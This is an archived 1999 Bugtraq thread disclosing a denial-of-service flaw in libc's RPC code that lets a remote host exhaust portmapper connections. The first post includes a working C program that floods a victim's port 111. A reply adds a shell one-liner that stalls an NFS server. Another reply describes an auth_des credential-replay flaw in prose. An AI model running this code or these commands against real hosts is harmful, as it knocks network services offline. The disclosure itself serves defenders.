Security vulnerabilities in several RPC implementations allow remote attacker to execute Denial of Service attacks. Exploit code included.
80bf64597b925cfc658fd34388749328f3a822cf5bba07966af6c3be386eeb3dDate: Wed, 14 Apr 1999 15:26:14 +0200
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@netspace.org
Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet, Poland
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Raport title : Lack of RPC's implementation in libc libraries
and how it affects for example portmap.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Raport created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Problem found at : 08 April 1999
Raport published : 14 April 1999
Raport code : KKIS.08041999.001.b
Short description : full description below
Vulnerable versions : libc*, up to current.
Platforms affected : Linux X.X, FreeBSD X.X, probably others...
Patches : curently not available
Archive : http://www.security.kki.pl/advisories/
Impact description : full description below
Risk level : medium
Notes : we were unable to contact with authors of libc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It seems that libc's RPC implementation does not check neither time
of established connections, nor number of connected sockets.
It is quite dangerous, because many network services is based on this
functions.
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below there is ther program which shows how to make DoS of portmap (tcp)
When max. limit of descriptors per process is not set, it could
easly lead to haevy problems with victim's machine stability.
(e.g. default sets on FreeBSD)
When limit of open descriptors is reached, portmap begins to refuse all
new connections.
~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
* example.c by Lukasz Luzar (lluzar@security.kki.pl)
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define ADDR "10.0.0.1" // victim's IP address in dot notation
#define PORT 111 // victim service to DoS eg. portmapper
void main()
{
int sockfd,
n = 0;
struct sockaddr_in victim_addr;
bzero((char *) &victim_addr, sizeof( victim_addr));
victim_addr.sin_family = AF_INET;
victim_addr.sin_addr.s_addr=inet_addr( ADDR);
victim_addr.sin_port = htons( PORT);
fprintf( stdout, "Opening new connections...\n");
for(;;) {
if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf( stderr, "socket error at %d\n",n);
break;
}
if( connect( sockfd,(struct sockaddr*) &victim_addr,
sizeof( victim_addr)) < 0) {
fprintf( stderr,"connect error at %d\n",n);
break;
}
n++;
}
fprintf( stdout, "Established %d connections "
"and waiting...\n", n);
for(;;);
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------------------------------------------
Date: Fri, 16 Apr 1999 10:19:47 +0200
From: Olaf Kirch <okir@MONAD.SWB.DE>
To: BUGTRAQ@netspace.org
Subject: Re: KKIS.08041999.001.b - security raport - flaws in rpc part of libc
On Wed, 14 Apr 1999 15:26:14 +0200, Lukasz Luzar wrote:
> Below there is ther program which shows how to make DoS of portmap (tcp)
> When max. limit of descriptors per process is not set, it could
> easly lead to haevy problems with victim's machine stability.
> (e.g. default sets on FreeBSD)
> When limit of open descriptors is reached, portmap begins to refuse all
> new connections.
It will continue to service UDP requests, which is what almost all
portmapper functions in libc use. Prominent exception is rpcinfo -p
which uses tcp. So I guess this attack is mostly a nuisance...
$ /tmp/pmap 127.0.0.1
Opening new connections...
Opened 252 connections and waiting...
^Z
$ rpcinfo -p
rpcinfo: can't contact portmapper: rpcinfo: RPC: Unable to receive; errno = Broken pipe
$ rpcinfo -u localhost portmap
program 100000 version 2 ready and waiting
BTW, there's some secure rpc bug i've been sitting on for a while; I
hear it has been fixed in Solaris 7: when using auth_des, you could
send an auth_des credential/verifier with a length of 0. The authentication
code would not verify the length passed by the client, hence using
whatever it had in its buffer from the most recent rpc call. Which
coincidentally is a valid credential/verifier pair by whoever placed
the last call to the server. And since replay protection only made
sure that the credential time stamp is not _smaller_ than the most
recent one from that principal, your call would be accepted...
Olaf
--
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
------------------------------------------------------------------------------------
Date: Thu, 15 Apr 1999 21:46:34 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@netspace.org
Subject: Re: KKIS.08041999.001.b - security raport - flaws in rpc part of libc
On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ### ### ### ### ###
> ### ### ### ### ###
> ###### ###### ###
> ### ### ### ### ###
> ### ### ### ### ###
>
> S E C U R I T Y
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> KKI Security Team Cracow Commercial Internet, Poland
> http://www.security.kki.pl http://www.kki.pl
> mailto:security@security.kki.pl mailto:biuro@kki.pl
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Raport title : Lack of RPC's implementation in libc libraries
> and how it affects for example portmap.
A much easier DOS is obtained by connecting to an RPC port and just sending some random
(most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services
in the same daemons. I have seen this bug in _every_ RPC implementation, with a few
exceptions: mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.
To wit:
[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.
Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS
mounted disk. The ls did not give any output until I ctrl-C'ed the telnet.
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed